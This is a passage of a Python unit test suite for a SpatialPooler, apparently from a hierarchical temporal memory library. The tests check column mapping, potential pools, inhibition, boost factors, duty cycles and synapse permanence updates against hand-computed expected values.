sp._activeDutyCycles = numpy.array([0, 0, 0, 0, 0, 0])
activeArray = numpy.ones(6)
sp.stripUnlearnedColumns(activeArray)
stripped = numpy.where(activeArray == 1)[0]
trueStripped = []
self.assertListEqual(trueStripped, list(stripped))
sp._activeDutyCycles = numpy.ones(6)
activeArray = numpy.ones(6)
sp.stripUnlearnedColumns(activeArray)
stripped = numpy.where(activeArray == 1)[0]
trueStripped = range(6)
self.assertListEqual(trueStripped, list(stripped))
def testMapColumn(self):
params = self._params.copy()
# Test 1D
params.update({
"columnDimensions": [4],
"inputDimensions": [12]
})
sp = SpatialPooler(**params)
self.assertEqual(sp._mapColumn(0), 1)
self.assertEqual(sp._mapColumn(1), 4)
self.assertEqual(sp._mapColumn(2), 7)
self.assertEqual(sp._mapColumn(3), 10)
# Test 1D with same dimensions of columns and inputs
params.update({
"columnDimensions": [4],
"inputDimensions": [4]
})
sp = SpatialPooler(**params)
self.assertEqual(sp._mapColumn(0), 0)
self.assertEqual(sp._mapColumn(1), 1)
self.assertEqual(sp._mapColumn(2), 2)
self.assertEqual(sp._mapColumn(3), 3)
# Test 1D with dimensions of length 1
params.update({
"columnDimensions": [1],
"inputDimensions": [1]
})
sp = SpatialPooler(**params)
self.assertEqual(sp._mapColumn(0), 0)
# Test 2D
params.update({
"columnDimensions": [12, 4],
"inputDimensions": [36, 12]
})
sp = SpatialPooler(**params)
self.assertEqual(sp._mapColumn(0), 13)
self.assertEqual(sp._mapColumn(4), 49)
self.assertEqual(sp._mapColumn(5), 52)
self.assertEqual(sp._mapColumn(7), 58)
self.assertEqual(sp._mapColumn(47), 418)
def testMapPotential1D(self):
params = self._params.copy()
params.update({
"inputDimensions": [12],
"columnDimensions": [4],
"potentialRadius": 2
})
# Test without wrapAround and potentialPct = 1
params["potentialPct"] = 1
sp = SpatialPooler(**params)
expectedMask = [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0]
mask = sp._mapPotential(0, wrapAround=False)
self.assertListEqual(mask.tolist(), expectedMask)
expectedMask = [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0]
mask = sp._mapPotential(2, wrapAround=False)
self.assertListEqual(mask.tolist(), expectedMask)
# Test with wrapAround and potentialPct = 1
params["potentialPct"] = 1
sp = SpatialPooler(**params)
expectedMask = [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1]
mask = sp._mapPotential(0, wrapAround=True)
self.assertListEqual(mask.tolist(), expectedMask)
expectedMask = [1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1]
mask = sp._mapPotential(3, wrapAround=True)
self.assertListEqual(mask.tolist(), expectedMask)
# Test with potentialPct < 1
params["potentialPct"] = 0.5
sp = SpatialPooler(**params)
supersetMask = numpy.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1])
mask = sp._mapPotential(0, wrapAround=True)
self.assertEqual(numpy.sum(mask), 3)
unionMask = supersetMask | mask.astype(int)
self.assertListEqual(unionMask.tolist(), supersetMask.tolist())
def testMapPotential2D(self):
params = self._params.copy()
params.update({
"columnDimensions": [2, 4],
"inputDimensions": [6, 12],
"potentialRadius": 1,
"potentialPct": 1
})
# Test without wrapAround
sp = SpatialPooler(**params)
trueIndicies = [0, 12, 24,
1, 13, 25,
2, 14, 26]
mask = sp._mapPotential(0, wrapAround=False)
self.assertSetEqual(set(numpy.flatnonzero(mask).tolist()), set(trueIndicies))
trueIndicies = [6, 18, 30,
7, 19, 31,
8, 20, 32]
mask = sp._mapPotential(2, wrapAround=False)
self.assertSetEqual(set(numpy.flatnonzero(mask).tolist()), set(trueIndicies))
# Test with wrapAround
params.update({
"potentialRadius": 2,
})
sp = SpatialPooler(**params)
trueIndicies = [71, 11, 23, 35, 47,
60, 0, 12, 24, 36,
61, 1, 13, 25, 37,
62, 2, 14, 26, 38,
63, 3, 15, 27, 39]
mask = sp._mapPotential(0, wrapAround=True)
self.assertSetEqual(set(numpy.flatnonzero(mask).tolist()), set(trueIndicies))
trueIndicies = [68, 8, 20, 32, 44,
69, 9, 21, 33, 45,
70, 10, 22, 34, 46,
71, 11, 23, 35, 47,
60, 0, 12, 24, 36]
mask = sp._mapPotential(3, wrapAround=True)
self.assertSetEqual(set(numpy.flatnonzero(mask).tolist()), set(trueIndicies))
def testMapPotential1Column1Input(self):
params = self._params.copy()
params.update({
"inputDimensions": [1],
"columnDimensions": [1],
"potentialRadius": 2
})
# Test without wrapAround and potentialPct = 1
params["potentialPct"] = 1
sp = SpatialPooler(**params)
expectedMask = [1]
mask = sp._mapPotential(0, wrapAround=False)
self.assertListEqual(mask.tolist(), expectedMask)
def testInhibitColumns(self):
sp = self._sp
sp._inhibitColumnsGlobal = Mock(return_value = 1)
sp._inhibitColumnsLocal = Mock(return_value = 2)
randomState = getNumpyRandomGenerator()
sp._numColumns = 5
sp._inhibitionRadius = 10
sp._columnDimensions = [5]
overlaps = randomState.random_sample(sp._numColumns)
sp._inhibitColumnsGlobal.reset_mock()
sp._inhibitColumnsLocal.reset_mock()
sp._numActiveColumnsPerInhArea = 5
sp._localAreaDensity = 0.1
sp._globalInhibition = True
sp._inhibitionRadius = 5
trueDensity = sp._localAreaDensity
sp._inhibitColumns(overlaps)
self.assertEqual(True, sp._inhibitColumnsGlobal.called)
self.assertEqual(False, sp._inhibitColumnsLocal.called)
density = sp._inhibitColumnsGlobal.call_args[0][1]
self.assertEqual(trueDensity, density)
sp._inhibitColumnsGlobal.reset_mock()
sp._inhibitColumnsLocal.reset_mock()
sp._numColumns = 500
sp._tieBreaker = numpy.zeros(500)
sp._columnDimensions = numpy.array([50, 10])
sp._numActiveColumnsPerInhArea = -1
sp._localAreaDensity = 0.1
sp._globalInhibition = False
sp._inhibitionRadius = 7
# 0.1 * (2*9+1)**2 = 22.5
trueDensity = sp._localAreaDensity
overlaps = randomState.random_sample(sp._numColumns)
sp._inhibitColumns(overlaps)
self.assertEqual(False, sp._inhibitColumnsGlobal.called)
self.assertEqual(True, sp._inhibitColumnsLocal.called)
    density = sp._inhibitColumnsLocal.call_args[0][1]
    self.assertEqual(trueDensity, density)
# Test translation of numColumnsPerInhArea into local area density
sp._numColumns = 1000
sp._tieBreaker = numpy.zeros(1000)
sp._columnDimensions = numpy.array([100, 10])
sp._inhibitColumnsGlobal.reset_mock()
sp._inhibitColumnsLocal.reset_mock()
sp._numActiveColumnsPerInhArea = 3
sp._localAreaDensity = -1
sp._globalInhibition = False
sp._inhibitionRadius = 4
trueDensity = 3.0/81.0
overlaps = randomState.random_sample(sp._numColumns)
# 3.0 / (((2*4) + 1) ** 2)
sp._inhibitColumns(overlaps)
self.assertEqual(False, sp._inhibitColumnsGlobal.called)
self.assertEqual(True, sp._inhibitColumnsLocal.called)
density = sp._inhibitColumnsLocal.call_args[0][1]
self.assertEqual(trueDensity, density)
# Test clipping of local area density to 0.5
sp._numColumns = 1000
sp._tieBreaker = numpy.zeros(1000)
sp._columnDimensions = numpy.array([100, 10])
sp._inhibitColumnsGlobal.reset_mock()
sp._inhibitColumnsLocal.reset_mock()
sp._numActiveColumnsPerInhArea = 7
sp._localAreaDensity = -1
sp._globalInhibition = False
sp._inhibitionRadius = 1
trueDensity = 0.5
overlaps = randomState.random_sample(sp._numColumns)
sp._inhibitColumns(overlaps)
self.assertEqual(False, sp._inhibitColumnsGlobal.called)
self.assertEqual(True, sp._inhibitColumnsLocal.called)
density = sp._inhibitColumnsLocal.call_args[0][1]
self.assertEqual(trueDensity, density)
def testUpdateBoostFactors(self):
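    # The expected factors below are consistent with a linear boost rule:
    # a factor of 1 when activeDutyCycle >= minActiveDutyCycle, rising linearly
    # to maxBoost as the duty cycle falls to 0, e.g. an active duty cycle at
    # one tenth of the minimum with maxBoost = 10 gives 1 + 0.9 * 9 = 9.1.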
sp = self._sp
sp._maxBoost = 10.0
sp._numColumns = 6
sp._minActiveDutyCycles = numpy.zeros(sp._numColumns) + 1e-6
sp._activeDutyCycles = numpy.array([0.1, 0.3, 0.02, 0.04, 0.7, 0.12])
sp._boostFactors = numpy.zeros(sp._numColumns)
trueBoostFactors = [1, 1, 1, 1, 1, 1]
sp._updateBoostFactors()
for i in range(sp._boostFactors.size):
self.assertAlmostEqual(trueBoostFactors[i], sp._boostFactors[i])
sp._maxBoost = 10.0
sp._numColumns = 6
sp._minActiveDutyCycles = numpy.array([0.1, 0.3, 0.02, 0.04, 0.7, 0.12])
sp._activeDutyCycles = numpy.array([0.1, 0.3, 0.02, 0.04, 0.7, 0.12])
trueBoostFactors = [1, 1, 1, 1, 1, 1]
sp._updateBoostFactors()
for i in range(sp._boostFactors.size):
self.assertLessEqual(abs(trueBoostFactors[i] - sp._boostFactors[i]), 1e-6)
sp._maxBoost = 10.0
sp._numColumns = 6
sp._minActiveDutyCycles = numpy.array([0.1, 0.2, 0.02, 0.03, 0.7, 0.12])
sp._activeDutyCycles = numpy.array([0.01, 0.02, 0.002, 0.003, 0.07, 0.012])
trueBoostFactors = [9.1, 9.1, 9.1, 9.1, 9.1, 9.1]
sp._updateBoostFactors()
for i in range(sp._boostFactors.size):
self.assertLessEqual(abs(trueBoostFactors[i] - sp._boostFactors[i]), 1e-6)
sp._maxBoost = 10.0
sp._numColumns = 6
sp._minActiveDutyCycles = numpy.array([0.1, 0.2, 0.02, 0.03, 0.7, 0.12])
sp._activeDutyCycles = numpy.zeros(sp._numColumns)
trueBoostFactors = 6*[sp._maxBoost]
sp._updateBoostFactors()
for i in range(sp._boostFactors.size):
self.assertLessEqual(abs(trueBoostFactors[i] - sp._boostFactors[i]), 1e-6)
def testUpdateInhibitionRadius(self):
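    # With global inhibition the radius is expected to be the largest column
    # dimension (57 below). Locally it is the average connected span times the
    # average number of columns per input, converted from a diameter to a
    # radius via (d - 1) / 2, rounded and clipped to a minimum of 1.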
sp = self._sp
# Test global inhibition case
sp._globalInhibition = True
sp._columnDimensions = numpy.array([57, 31, 2])
sp._updateInhibitionRadius()
self.assertEqual(sp._inhibitionRadius, 57)
sp._globalInhibition = False
sp._avgConnectedSpanForColumnND = Mock(return_value = 3)
sp._avgColumnsPerInput = Mock(return_value = 4)
trueInhibitionRadius = 6
# ((3 * 4) - 1) / 2 => round up
sp._updateInhibitionRadius()
self.assertEqual(trueInhibitionRadius, sp._inhibitionRadius)
# Test clipping at 1.0
sp._globalInhibition = False
sp._avgConnectedSpanForColumnND = Mock(return_value = 0.5)
sp._avgColumnsPerInput = Mock(return_value = 1.2)
trueInhibitionRadius = 1
sp._updateInhibitionRadius()
self.assertEqual(trueInhibitionRadius, sp._inhibitionRadius)
# Test rounding up
sp._globalInhibition = False
sp._avgConnectedSpanForColumnND = Mock(return_value = 2.4)
sp._avgColumnsPerInput = Mock(return_value = 2)
trueInhibitionRadius = 2
# ((2 * 2.4) - 1) / 2.0 => round up
sp._updateInhibitionRadius()
self.assertEqual(trueInhibitionRadius, sp._inhibitionRadius)
def testAvgColumnsPerInput(self):
sp = self._sp
sp._columnDimensions = numpy.array([2, 2, 2, 2])
sp._inputDimensions = numpy.array([4, 4, 4, 4])
self.assertEqual(sp._avgColumnsPerInput(), 0.5)
sp._columnDimensions = numpy.array([2, 2, 2, 2])
sp._inputDimensions = numpy.array( [7, 5, 1, 3])
# 2/7 0.4 2 0.666
trueAvgColumnPerInput = (2.0/7 + 2.0/5 + 2.0/1 + 2/3.0) / 4
self.assertEqual(sp._avgColumnsPerInput(), trueAvgColumnPerInput)
sp._columnDimensions = numpy.array([3, 3])
sp._inputDimensions = numpy.array( [3, 3])
# 1 1
trueAvgColumnPerInput = 1
self.assertEqual(sp._avgColumnsPerInput(), trueAvgColumnPerInput)
sp._columnDimensions = numpy.array([25])
sp._inputDimensions = numpy.array( [5])
# 5
trueAvgColumnPerInput = 5
self.assertEqual(sp._avgColumnsPerInput(), trueAvgColumnPerInput)
sp._columnDimensions = numpy.array([3, 3, 3, 5, 5, 6, 6])
sp._inputDimensions = numpy.array( [3, 3, 3, 5, 5, 6, 6])
# 1 1 1 1 1 1 1
trueAvgColumnPerInput = 1
self.assertEqual(sp._avgColumnsPerInput(), trueAvgColumnPerInput)
sp._columnDimensions = numpy.array([3, 6, 9, 12])
sp._inputDimensions = numpy.array( [3, 3, 3 , 3])
# 1 2 3 4
trueAvgColumnPerInput = 2.5
self.assertEqual(sp._avgColumnsPerInput(), trueAvgColumnPerInput)
def testAvgConnectedSpanForColumn1D(self):
sp = self._sp
sp._numColumns = 9
sp._columnDimensions = numpy.array([9])
sp._inputDimensions = numpy.array([12])
sp._connectedSynapses = (
BinaryCorticalColumns([[0, 1, 0, 1, 0, 1, 0, 1],
[0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1]]))
trueAvgConnectedSpan = [7, 5, 1, 5, 0, 2, 3, 3, 8]
for i in xrange(sp._numColumns):
connectedSpan = sp._avgConnectedSpanForColumn1D(i)
self.assertEqual(trueAvgConnectedSpan[i], connectedSpan)
def testAvgConnectedSpanForColumn2D(self):
sp = self._sp
sp._numColumns = 9
sp._columnDimensions = numpy.array([9])
    sp._numInputs = 8
sp._inputDimensions = numpy.array([8])
sp._connectedSynapses = (
BinaryCorticalColumns([[0, 1, 0, 1, 0, 1, 0, 1],
[0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1]]))
trueAvgConnectedSpan = [7, 5, 1, 5, 0, 2, 3, 3, 8]
for i in xrange(sp._numColumns):
connectedSpan = sp._avgConnectedSpanForColumn1D(i)
self.assertEqual(trueAvgConnectedSpan[i], connectedSpan)
sp._numColumns = 7
sp._columnDimensions = numpy.array([7])
sp._numInputs = 20
sp._inputDimensions = numpy.array([5, 4])
sp._connectedSynapses = BinaryCorticalColumns(sp._numInputs)
sp._connectedSynapses.resize(sp._numColumns, sp._numInputs)
connected = numpy.array([
[[0, 1, 1, 1],
[0, 1, 1, 1],
[0, 1, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]],
# rowspan = 3, colspan = 3, avg = 3
[[1, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]],
# rowspan = 2 colspan = 4, avg = 3
[[1, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 1]],
# row span = 5, colspan = 4, avg = 4.5
[[0, 1, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 1, 0, 0],
[0, 1, 0, 0]],
# rowspan = 5, colspan = 1, avg = 3
[[0, 0, 0, 0],
[1, 0, 0, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]],
# rowspan = 1, colspan = 4, avg = 2.5
[[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]],
# rowspan = 2, colspan = 2, avg = 2
[[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]
# rowspan = 0, colspan = 0, avg = 0
])
trueAvgConnectedSpan = [3, 3, 4.5, 3, 2.5, 2, 0]
for columnIndex in xrange(sp._numColumns):
sp._connectedSynapses.replace(
columnIndex, connected[columnIndex].reshape(-1).nonzero()[0]
)
for i in xrange(sp._numColumns):
connectedSpan = sp._avgConnectedSpanForColumn2D(i)
self.assertEqual(trueAvgConnectedSpan[i], connectedSpan)
def testAvgConnectedSpanForColumnND(self):
sp = self._sp
sp._inputDimensions = numpy.array([4, 4, 2, 5])
sp._numInputs = numpy.prod(sp._inputDimensions)
sp._numColumns = 5
sp._columnDimensions = numpy.array([5])
sp._connectedSynapses = BinaryCorticalColumns(sp._numInputs)
sp._connectedSynapses.resize(sp._numColumns, sp._numInputs)
connected = numpy.zeros(sp._numInputs).reshape(sp._inputDimensions)
connected[1][0][1][0] = 1
connected[1][0][1][1] = 1
connected[3][2][1][0] = 1
connected[3][0][1][0] = 1
connected[1][0][1][3] = 1
connected[2][2][1][0] = 1
# span: 3 3 1 4, avg = 11/4
sp._connectedSynapses.replace(0, connected.reshape(-1).nonzero()[0])
connected = numpy.zeros(sp._numInputs).reshape(sp._inputDimensions)
connected[2][0][1][0] = 1
connected[2][0][0][0] = 1
connected[3][0][0][0] = 1
connected[3][0][1][0] = 1
    # span: 2 1 2 1, avg = 6/4
sp._connectedSynapses.replace(1, connected.reshape(-1).nonzero()[0])
connected = numpy.zeros(sp._numInputs).reshape(sp._inputDimensions)
connected[0][0][1][4] = 1
connected[0][0][0][3] = 1
connected[0][0][0][1] = 1
connected[1][0][0][2] = 1
connected[0][0][1][1] = 1
connected[3][3][1][1] = 1
# span: 4 4 2 4, avg = 14/4
sp._connectedSynapses.replace(2, connected.reshape(-1).nonzero()[0])
connected = numpy.zeros(sp._numInputs).reshape(sp._inputDimensions)
connected[3][3][1][4] = 1
connected[0][0][0][0] = 1
# span: 4 4 2 5, avg = 15/4
sp._connectedSynapses.replace(3, connected.reshape(-1).nonzero()[0])
connected = numpy.zeros(sp._numInputs).reshape(sp._inputDimensions)
# span: 0 0 0 0, avg = 0
sp._connectedSynapses.replace(4, connected.reshape(-1).nonzero()[0])
trueAvgConnectedSpan = [11.0/4, 6.0/4, 14.0/4, 15.0/4, 0]
for i in xrange(sp._numColumns):
connectedSpan = sp._avgConnectedSpanForColumnND(i)
self.assertAlmostEqual(trueAvgConnectedSpan[i], connectedSpan)
def testBumpUpWeakColumns(self):
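    # Columns whose overlap duty cycle is below the minimum (columns 0, 1, 3
    # and 4 below) are expected to have every potential synapse bumped by
    # synPermBelowStimulusInc, with any value falling under
    # synPermTrimThreshold trimmed back to zero; column 2 stays unchanged.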
sp = SpatialPooler(inputDimensions=[8],
columnDimensions=[5])
sp._synPermBelowStimulusInc = 0.01
sp._synPermTrimThreshold = 0.05
sp._overlapDutyCycles = numpy.array([0, 0.009, 0.1, 0.001, 0.002])
sp._minOverlapDutyCycles = numpy.array(5*[0.01])
sp._potentialPools = BinaryCorticalColumns(
[[1, 1, 1, 1, 0, 0, 0, 0],
[1, 0, 0, 0, 1, 1, 0, 1],
[0, 0, 1, 0, 1, 1, 1, 0],
[1, 1, 1, 0, 0, 0, 1, 0],
[1, 1, 1, 1, 1, 1, 1, 1]])
sp._permanences = CorticalColumns(
[[0.200, 0.120, 0.090, 0.040, 0.000, 0.000, 0.000, 0.000],
[0.150, 0.000, 0.000, 0.000, 0.180, 0.120, 0.000, 0.450],
[0.000, 0.000, 0.014, 0.000, 0.032, 0.044, 0.110, 0.000],
[0.041, 0.000, 0.000, 0.000, 0.000, 0.000, 0.178, 0.000],
[0.100, 0.738, 0.045, 0.002, 0.050, 0.008, 0.208, 0.034]])
truePermanences = [
[0.210, 0.130, 0.100, 0.000, 0.000, 0.000, 0.000, 0.000],
# Inc Inc Inc Trim - - - -
[0.160, 0.000, 0.000, 0.000, 0.190, 0.130, 0.000, 0.460],
# Inc - - - Inc Inc - Inc
[0.000, 0.000, 0.014, 0.000, 0.032, 0.044, 0.110, 0.000], #unchanged
# - - - - - - - -
[0.051, 0.000, 0.000, 0.000, 0.000, 0.000, 0.188, 0.000],
# Inc Trim Trim - - - Inc -
[0.110, 0.748, 0.055, 0.000, 0.060, 0.000, 0.218, 0.000]]
sp._bumpUpWeakColumns()
for i in xrange(sp._numColumns):
perm = list(sp._permanences.getRow(i))
for j in xrange(sp._numInputs):
self.assertAlmostEqual(truePermanences[i][j], perm[j])
def testUpdateMinDutyCycleLocal(self):
sp = self._sp
# Replace the get neighbors function with a mock to know exactly
# the neighbors of each column.
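    # Each column's minimum duty cycle is expected to be minPct times the
    # largest duty cycle found in its (mocked) neighborhood, e.g. 0.04 * 1.4
    # for column 0, whose neighborhood overlap duty cycles are 1.4, 0.5, 1.2.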
sp._numColumns = 5
sp._getNeighborsND = Mock(side_effect=[[0, 1, 2],
[1, 2, 3],
[2, 3, 4],
[0, 2, 4],
[0, 1, 3]])
sp._minPctOverlapDutyCycles = 0.04
sp._overlapDutyCycles = numpy.array([1.4, 0.5, 1.2, 0.8, 0.1])
trueMinOverlapDutyCycles = [0.04*1.4, 0.04*1.2, 0.04*1.2, 0.04*1.4,
0.04*1.4]
sp._minPctActiveDutyCycles = 0.02
sp._activeDutyCycles = numpy.array([0.4, 0.5, 0.2, 0.18, 0.1])
trueMinActiveDutyCycles = [0.02*0.5, 0.02*0.5, 0.02*0.2, 0.02*0.4,
0.02*0.5]
sp._minOverlapDutyCycles = numpy.zeros(sp._numColumns)
sp._minActiveDutyCycles = numpy.zeros(sp._numColumns)
sp._updateMinDutyCyclesLocal()
self.assertListEqual(trueMinOverlapDutyCycles,
list(sp._minOverlapDutyCycles))
self.assertListEqual(trueMinActiveDutyCycles, list(sp._minActiveDutyCycles))
sp._numColumns = 8
sp._getNeighborsND = Mock(side_effect= [[0, 1, 2, 3, 4],
[1, 2, 3, 4, 5],
[2, 3, 4, 6, 7],
[0, 2, 4, 6],
[1, 6],
[3, 5, 7],
[1, 4, 5, 6],
[2, 3, 6, 7]])
sp._minPctOverlapDutyCycles = 0.01
sp._overlapDutyCycles = numpy.array(
[1.2, 2.7, 0.9, 1.1, 4.3, 7.1, 2.3, 0.0])
trueMinOverlapDutyCycles = [0.01*4.3, 0.01*7.1, 0.01*4.3, 0.01*4.3,
0.01*4.3, 0.01*7.1, 0.01*7.1, 0.01*2.3]
sp._minPctActiveDutyCycles = 0.03
sp._activeDutyCycles = numpy.array(
[0.14, 0.25, 0.125, 0.33, 0.27, 0.11, 0.76, 0.31])
trueMinActiveDutyCycles = [0.03*0.33, 0.03*0.33, 0.03*0.76, 0.03*0.76,
0.03*0.76, 0.03*0.33, 0.03*0.76, 0.03*0.76]
sp._minOverlapDutyCycles = numpy.zeros(sp._numColumns)
sp._minActiveDutyCycles = numpy.zeros(sp._numColumns)
sp._updateMinDutyCyclesLocal()
self.assertListEqual(trueMinOverlapDutyCycles,
list(sp._minOverlapDutyCycles))
self.assertListEqual(trueMinActiveDutyCycles, list(sp._minActiveDutyCycles))
def testUpdateMinDutyCyclesGlobal(self):
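    # Globally, every column gets the same minimum: minPct times the maximum
    # duty cycle over all columns, e.g. 0.02 * 0.6 for the active duty cycles
    # and 0.01 * 6 for the overlap duty cycles in the first case below.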
sp = self._sp
sp._minPctOverlapDutyCycles = 0.01
sp._minPctActiveDutyCycles = 0.02
sp._numColumns = 5
sp._overlapDutyCycles = numpy.array([0.06, 1, 3, 6, 0.5])
sp._activeDutyCycles = numpy.array([0.6, 0.07, 0.5, 0.4, 0.3])
sp._updateMinDutyCyclesGlobal()
trueMinActiveDutyCycles = sp._numColumns*[0.02*0.6]
trueMinOverlapDutyCycles = sp._numColumns*[0.01*6]
for i in xrange(sp._numColumns):
self.assertAlmostEqual(trueMinActiveDutyCycles[i],
sp._minActiveDutyCycles[i])
self.assertAlmostEqual(trueMinOverlapDutyCycles[i],
sp._minOverlapDutyCycles[i])
sp._minPctOverlapDutyCycles = 0.015
sp._minPctActiveDutyCycles = 0.03
sp._numColumns = 5
sp._overlapDutyCycles = numpy.array([0.86, 2.4, 0.03, 1.6, 1.5])
sp._activeDutyCycles = numpy.array([0.16, 0.007, 0.15, 0.54, 0.13])
sp._updateMinDutyCyclesGlobal()
trueMinOverlapDutyCycles = sp._numColumns*[0.015*2.4]
for i in xrange(sp._numColumns):
self.assertAlmostEqual(trueMinOverlapDutyCycles[i],
sp._minOverlapDutyCycles[i])
sp._minPctOverlapDutyCycles = 0.015
sp._minPctActiveDutyCycles= 0.03
sp._numColumns = 5
sp._overlapDutyCycles = numpy.zeros(5)
sp._activeDutyCycles = numpy.zeros(5)
sp._updateMinDutyCyclesGlobal()
trueMinOverlapDutyCycles = sp._numColumns * [0]
trueMinActiveDutyCycles = sp._numColumns * [0]
for i in xrange(sp._numColumns):
self.assertAlmostEqual(trueMinActiveDutyCycles[i],
sp._minActiveDutyCycles[i])
self.assertAlmostEqual(trueMinOverlapDutyCycles[i],
sp._minOverlapDutyCycles[i])
def testIsUpdateRound(self):
sp = self._sp
sp._updatePeriod = 50
sp._iterationNum = 1
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 39
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 50
self.assertEqual(sp._isUpdateRound(), True)
sp._iterationNum = 1009
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 1250
self.assertEqual(sp._isUpdateRound(), True)
sp._updatePeriod = 125
sp._iterationNum = 0
self.assertEqual(sp._isUpdateRound(), True)
sp._iterationNum = 200
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 249
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 1330
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 1249
self.assertEqual(sp._isUpdateRound(), False)
sp._iterationNum = 1375
self.assertEqual(sp._isUpdateRound(), True)
def testAdaptSynapses(self):
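    # For each active column, permanences on active input bits inside its
    # potential pool are expected to grow by synPermActiveInc (0.1) while the
    # remaining potential synapses shrink by synPermInactiveDec (0.01); values
    # below synPermTrimThreshold are trimmed to zero and inactive columns
    # (column 3 below) are left untouched.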
sp = SpatialPooler(inputDimensions=[8],
columnDimensions=[4],
synPermInactiveDec=0.01,
synPermActiveInc=0.1)
sp._synPermTrimThreshold = 0.05
sp._potentialPools = BinaryCorticalColumns(
[[1, 1, 1, 1, 0, 0, 0, 0],
[1, 0, 0, 0, 1, 1, 0, 1],
[0, 0, 1, 0, 0, 0, 1, 0],
[1, 0, 0, 0, 0, 0, 1, 0]])
inputVector = numpy.array([1, 0, 0, 1, 1, 0, 1, 0])
activeColumns = numpy.array([0, 1, 2])
sp._permanences = CorticalColumns(
[[0.200, 0.120, 0.090, 0.040, 0.000, 0.000, 0.000, 0.000],
[0.150, 0.000, 0.000, 0.000, 0.180, 0.120, 0.000, 0.450],
[0.000, 0.000, 0.014, 0.000, 0.000, 0.000, 0.110, 0.000],
[0.040, 0.000, 0.000, 0.000, 0.000, 0.000, 0.178, 0.000]])
truePermanences = [
[0.300, 0.110, 0.080, 0.140, 0.000, 0.000, 0.000, 0.000],
# Inc Dec Dec Inc - - - -
[0.250, 0.000, 0.000, 0.000, 0.280, 0.110, 0.000, 0.440],
# Inc - - - Inc Dec - Dec
[0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.210, 0.000],
# - - Trim - - - Inc -
[0.040, 0.000, 0.000, 0.000, 0.000, 0.000, 0.178, 0.000]]
# - - - - - - - -
sp._adaptSynapses(inputVector, activeColumns)
for i in xrange(sp._numColumns):
perm = list(sp._permanences.getRow(i))
for j in xrange(sp._numInputs):
self.assertAlmostEqual(truePermanences[i][j], perm[j])
sp._potentialPools = BinaryCorticalColumns(
[[1, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 1, 0]])
inputVector = numpy.array([1, 0, 0, 1, 1, 0, 1, 0])
activeColumns = numpy.array([0, 1, 2])
sp._permanences = CorticalColumns(
[[0.200, 0.120, 0.090, 0.000, 0.000, 0.000, 0.000, 0.000],
[0.000, 0.017, 0.232, 0.400, 0.000, 0.000, 0.000, 0.000],
[0.000, 0.000, 0.014, 0.051, 0.730, 0.000, 0.000, 0.000],
[0.170, 0.000, 0.000, 0.000, 0.000, 0.000, 0.380, 0.000]])
truePermanences = [
[0.30, 0.110, 0.080, 0.000, 0.000, 0.000, 0.000, 0.000],
# Inc Dec Dec - - - - -
[0.000, 0.000, 0.222, 0.500, 0.000, 0.000, 0.000, 0.000],
# - Trim Dec Inc - - - -
[0.000, 0.000, 0.000, 0.151, 0.830, 0.000, 0.000, 0.000],
# - - Trim Inc Inc - - -
[0.170, 0.000, 0.000, 0.000, 0.000, 0.000, 0.380, 0.000]]
# - - - - - - - -
sp._adaptSynapses(inputVector, activeColumns)
for i in xrange(sp._numColumns):
perm = list(sp._permanences.getRow(i))
for j in xrange(sp._numInputs):
self.assertAlmostEqual(truePermanences[i][j], perm[j])
def testRaisePermanenceThreshold(self):
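    # Permanences in the mask are expected to be bumped repeatedly by
    # synPermBelowStimulusInc (0.01) until at least stimulusThreshold (3)
    # synapses reach synPermConnected; the comments on truePermanences below
    # record how many bumps each column needs.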
sp = self._sp
sp._inputDimensions=numpy.array([5])
sp._columnDimensions=numpy.array([5])
sp._synPermConnected=0.1
sp._stimulusThreshold=3
sp._synPermBelowStimulusInc = 0.01
sp._permanences = CorticalColumns(
[[0.0, 0.11, 0.095, 0.092, 0.01],
[0.12, 0.15, 0.02, 0.12, 0.09],
[0.51, 0.081, 0.025, 0.089, 0.31],
[0.18, 0.0601, 0.11, 0.011, 0.03],
[0.011, 0.011, 0.011, 0.011, 0.011]])
sp._connectedSynapses = BinaryCorticalColumns([[0, 1, 0, 0, 0],
[1, 1, 0, 1, 0],
[1, 0, 0, 0, 1],
[1, 0, 1, 0, 0],
[0, 0, 0, 0, 0]])
sp._connectedCounts = numpy.array([1, 3, 2, 2, 0])
truePermanences = [
[0.01, 0.12, 0.105, 0.102, 0.02], # incremented once
